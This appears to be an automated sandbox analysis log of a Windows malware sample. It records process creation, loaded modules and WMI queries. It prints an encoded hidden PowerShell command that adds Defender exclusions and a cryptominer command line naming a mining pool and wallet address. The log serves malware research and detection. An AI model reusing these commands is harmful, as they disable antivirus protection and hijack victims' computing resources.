Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PT54FFSL7ET46RASB.exe	ReversingLabs: Detection: 34%
Source: PT54FFSL7ET46RASB.exe	Virustotal: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe "C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe"
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe "C:\Users\user\AppData\Roaming\HPd7I3vQri.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe "C:\Users\user\AppData\Roaming\yTRfYxWiym.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1780
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe "C:\Users\user\AppData\Roaming\HPd7I3vQri.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe "C:\Users\user\AppData\Roaming\yTRfYxWiym.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1780
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: bcp47langs.dll	Jump to behavior
